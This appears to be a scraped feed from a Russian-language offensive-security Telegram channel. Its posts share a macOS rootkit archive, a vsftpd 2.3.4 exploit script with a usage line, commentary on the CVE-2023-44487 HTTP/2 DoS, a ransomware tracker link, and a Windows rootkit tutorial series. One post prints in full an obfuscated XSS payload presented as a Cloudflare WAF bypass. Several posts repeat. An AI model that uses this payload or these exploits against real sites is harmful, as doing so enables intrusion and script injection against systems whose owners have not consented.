MacOS_RootKit.tar.lzma
24.8 MB
macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
👍10
vsftpd_exploit.py
1.8 KB
vsftpd (для версии 2.3.4)
usage:
usage:
python3 vsftpd_exploit.py <IP address> <port> <command>🔥19😱5👍1
CVE-2023-44487
уязвимость в протоколе HTTP/2
Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etc
Пик атаки составлял 389 000 000 (да да) запросов в секунду.
Ну и конечно же все это уплыло ))))
Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.
link 1
link 2
link 3
link 4
link 5
what the fuck notes
#DoS #HA
уязвимость в протоколе HTTP/2
Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etc
Пик атаки составлял 389 000 000 (да да) запросов в секунду.
Ну и конечно же все это уплыло ))))
Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.
link 1
link 2
link 3
link 4
link 5
what the fuck notes
#DoS #HA
🔥15👍7
Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))
https://ransomware.live/#/status
https://ransomware.live/#/status
👍25😱2
Windows rootkit development for red teaming
*
Part 1 | Introduction
Part 2 | A tale of routines, IOCTLs and IRPs
Part 3 | Sailing to the land of the user (and debugging the ship)
Part 4 | The call back home
Part 5 | Saruman's Manipulation
*
#malware #windows #rootkit
*
Part 1 | Introduction
Part 2 | A tale of routines, IOCTLs and IRPs
Part 3 | Sailing to the land of the user (and debugging the ship)
Part 4 | The call back home
Part 5 | Saruman's Manipulation
*
#malware #windows #rootkit
🔥16👍3😱3
Cloudflare bypass WAF
*
Payload:
*
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
#cloudflare #bypass #waf #xss🔥53😱4
Каждый раз смешно )))
И мало того, оно даже документировано -
И мало того, оно даже документировано -
Windows Internals part 2
#remoteRegistry #135👍17🔥1